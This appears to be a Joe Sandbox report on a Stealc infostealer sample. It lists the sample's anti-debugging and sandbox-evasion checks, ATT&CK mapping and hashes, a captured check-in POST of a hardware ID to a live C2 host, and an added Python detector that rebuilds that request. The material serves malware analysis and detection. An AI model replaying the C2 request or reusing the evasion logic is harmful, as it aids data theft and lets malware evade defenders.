                Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13406
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13395
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13392
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13446
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13414
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009445C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_009445C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00959860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959750 mov eax, dword ptr fs:[00000030h] | 0_2_00959750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_009578E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00959600
Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: DProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00957B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00957980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00957980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00957850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00957850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00957A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00957A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the figure shown next to that technique in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/n | file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/I~ | file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.php2 | file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpd | file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.phpo? | file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.phpW | file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1520474
                                  Start date and time:2024-09-27 11:25:14 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 6s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 81%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 88
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe
                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.103
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.950254409898125
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'828'864 bytes
                                  MD5:219066ac9697d1cdeb536bc4ea74c123
                                  SHA1:a8f5b34c40766dbf7ae0140c581dc23c5d75918f
                                  SHA256:ce8350a94bca9e1e552275527845443db7c0d0159e34e53220bfe38fed03e041
                                  SHA512:0bfc7e3adcf4712c8f2d21810e0649edaaeff972cb3bd8a31f420200188eb2221593d9966bf8ff91e68162de9bd4f90a3676beb8bea90faa32272882ae9f81f4
                                  SSDEEP:49152:s+tFXr7DkxHdvqpZ+w2wg8I2wBnU7S0sOUP:5FXYGZh2wNwG7Shz
                                  TLSH:6585332915FE6567E8D4B6FB4C96E55173304188B3EADB588D2E081CC8532EBEB274F0
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xa94000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F0D347D556Ah
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x25b000 | 0x22800 | e7159ffa3568b45fa3b2b8962d1733f1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x25e000 | 0x29c000 | 0x200 | 8986414a4283016787d364827c1139d7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pypkqjdw | 0x4fa000 | 0x199000 | 0x198600 | 244bd8c28c640b55e029112112d77f7d | False | 0.9947862861570248 | data | 7.954735554227634 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fqpfwnfj | 0x693000 | 0x1000 | 0x400 | 2783b76b2e8883456f84738cca2afa5e | False | 0.76953125 | data | 6.045613105784281 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x694000 | 0x3000 | 0x2200 | 8e1cf350a09aa419ed23d4046073b9f8 | False | 0.05893841911764706 | DOS executable (COM) | 0.8287402387401129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T11:26:07.373709+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 11:26:06.398092031 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 11:26:06.404483080 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 11:26:06.404596090 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 11:26:06.404795885 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 11:26:06.409606934 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 11:26:07.132663965 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 11:26:07.132807970 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 11:26:07.137233973 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 11:26:07.144748926 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 11:26:07.373567104 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 11:26:07.373708963 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 11:26:11.487101078 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                                  • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 1216 | C:\Users\user\Desktop\file.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Sep 27, 2024 11:26:06.404795885 CEST | 89 | OUT | GET / HTTP/1.1
                                   Host: 185.215.113.37
                                   Connection: Keep-Alive
                                   Cache-Control: no-cache
                                   Sep 27, 2024 11:26:07.132663965 CEST | 203 | IN | HTTP/1.1 200 OK
                                   Date: Fri, 27 Sep 2024 09:26:07 GMT
                                   Server: Apache/2.4.52 (Ubuntu)
                                   Content-Length: 0
                                   Keep-Alive: timeout=5, max=100
                                   Connection: Keep-Alive
                                   Content-Type: text/html; charset=UTF-8
                                   Sep 27, 2024 11:26:07.137233973 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                   Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ
                                   Host: 185.215.113.37
                                   Content-Length: 211
                                   Connection: Keep-Alive
                                   Cache-Control: no-cache
                                   Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a
                                   Data Ascii (multipart body, CRLF line breaks restored):
                                   ------KFBAECBAEGDGDHIEHIJJ
                                   Content-Disposition: form-data; name="hwid"

                                   AE633992F9F51660493485
                                   ------KFBAECBAEGDGDHIEHIJJ
                                   Content-Disposition: form-data; name="build"

                                   save
                                   ------KFBAECBAEGDGDHIEHIJJ--
                                   Sep 27, 2024 11:26:07.373567104 CEST | 210 | IN | HTTP/1.1 200 OK
                                   Date: Fri, 27 Sep 2024 09:26:07 GMT
                                   Server: Apache/2.4.52 (Ubuntu)
                                   Content-Length: 8
                                   Keep-Alive: timeout=5, max=99
                                   Connection: Keep-Alive
                                   Content-Type: text/html; charset=UTF-8
                                   Data Raw: 59 6d 78 76 59 32 73 3d
                                   Data Ascii: YmxvY2s= (base64 for "block"; no further HTTP requests from the sample appear in the capture after this reply)
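The exchange above, a bare GET / followed by a multipart POST of hwid and build to a 16-hex-character .php path, answered with a short base64 body, is the traffic that coincides with the Suricata alert. The matcher below is an added example written for this page; it is not code from the Joe Sandbox report and not the ET/SEKOIA rule behind SID 2044243, whose content is not shown here. Every indicator it checks (POST to a 16-hex .php path, multipart/form-data carrying exactly the fields hwid and build, no User-Agent header, Content-Length equal to the body) is an assumption generalised from this single capture; the sample request and reply are reconstructed from the bytes shown above, and the benign request for the negative case is constructed.

```python
# Added example for this page: a heuristic matcher for the captured check-in.
# It is not code from the Joe Sandbox report and not the ET/SEKOIA rule behind
# SID 2044243; every criterion below is an assumption drawn from this one
# request/response pair, so treat the verdict as a triage aid, not a signature.
import base64
import re
from typing import Dict, Optional

BOUNDARY = b"----KFBAECBAEGDGDHIEHIJJ"         # boundary seen in the capture
PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")  # shape of /e2b1563c6670f193.php


def build_multipart(fields: Dict[bytes, bytes], boundary: bytes) -> bytes:
    """Lay out a multipart/form-data body the way the captured POST does."""
    out = b""
    for name, value in fields.items():
        out += b"--" + boundary + b"\r\n"
        out += b'Content-Disposition: form-data; name="' + name + b'"\r\n\r\n'
        out += value + b"\r\n"
    return out + b"--" + boundary + b"--\r\n"


# Reconstruction of the captured request and reply (CRLFs re-inserted).
SAMPLE_BODY = build_multipart({b"hwid": b"AE633992F9F51660493485", b"build": b"save"}, BOUNDARY)
SAMPLE_REQUEST = b"".join([
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n",
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n",
    b"Host: 185.215.113.37\r\n",
    b"Content-Length: 211\r\n",  # value as captured; verified against the body below
    b"Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    SAMPLE_BODY,
])
SAMPLE_RESPONSE = b"".join([
    b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.52 (Ubuntu)\r\nContent-Length: 8\r\n",
    b"Content-Type: text/html; charset=UTF-8\r\n\r\nYmxvY2s=",
])
# Constructed benign browser-style form POST for the negative case.
BENIGN_REQUEST = b"".join([
    b"POST /login.php HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n",
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 17\r\n\r\n",
    b"user=a&password=b",
])


def parse_http_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, lowercased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Return {field name: raw value} for a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble / closing delimiter
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_head)
        if m:
            fields[m.group(1).decode("latin-1")] = value
    return fields


def classify_checkin(raw_request: bytes) -> Dict[str, object]:
    """Score a request against the traits of the captured check-in."""
    start_line, headers, body = parse_http_message(raw_request)
    method, path, _ = start_line.split(" ", 2)
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    fields = parse_multipart(body, m.group(1).encode("latin-1")) if m else {}
    clen = headers.get("content-length")
    indicators = {
        "post_to_16hex_php": method == "POST" and bool(PATH_RE.match(path)),
        "multipart_form": ctype.startswith("multipart/form-data"),
        "hwid_and_build_fields": {"hwid", "build"} <= set(fields),
        "no_user_agent": "user-agent" not in headers,  # absent in the capture
        "content_length_matches": clen is not None and int(clen) == len(body),
    }
    return {
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
        "indicators": indicators,
        "stealc_like": all(indicators.values()),
    }


def decode_checkin_response(raw_response: bytes) -> Optional[str]:
    """Base64-decode the C2 reply body; None if it is not valid base64 text."""
    _, headers, body = parse_http_message(raw_response)
    if "content-length" in headers:
        body = body[: int(headers["content-length"])]
    try:
        return base64.b64decode(body, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
```

classify_checkin(SAMPLE_REQUEST) reports every indicator True and decode_checkin_response(SAMPLE_RESPONSE) returns "block", while the browser-style POST trips neither the path nor the field-name indicators. The Content-Length indicator doubles as a check that the rebuilt body is the same 211 bytes the capture shows; if a reconstruction drifts, that indicator is the first to fail.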
                                  Target ID:0
                                  Start time:05:26:04
                                  Start date:27/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x940000
                                  File size:1'828'864 bytes
                                  MD5 hash:219066AC9697D1CDEB536BC4EA74C123
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:8.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:10.1%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:24
                                     execution_graph (node dump of the interactive graph viewer; only the call sequence recoverable from the node labels is kept here, addresses inside the image loaded at 0x940000):
                                     • 0x9569f0 → 0x942260: a long run of sequential calls into 0x9445c0 (RtlAllocateHeap, VirtualProtect), matching the "Detected unpacking (changes PE section rights)" and "Found potential string decryption / allocating functions" signatures.
                                     • 0x959860 → 0x959750 (GetPEB), then five LoadLibraryA calls (0x959a93) and a series of GetProcAddress calls: dynamic import resolution.
                                     • 0x9411d0 onward: a chain of environment checks in which 0x9411d0, GetSystemInfo (0x941160), GetCurrentProcess + VirtualAllocExNuma (0x941110), GlobalMemoryStatusEx (0x9589b0) and GetUserDefaultLangID (0x956770, five separate ExitProcess branches; the locale check named by "Found evasive API chain") each have a branch straight to ExitProcess, with a VirtualAlloc/VirtualFree probe (0x9410a0) in between.
                                     • GetProcessHeap + RtlAllocateHeap + GetUserNameA (0x957850, with its own ExitProcess branch at 0x9411c4) and GetComputerNameA (0x9578e0); string assembly through lstrlen/lstrcpy/lstrcat (0x95a9b0, 0x95a7a0, 0x95a8a0).
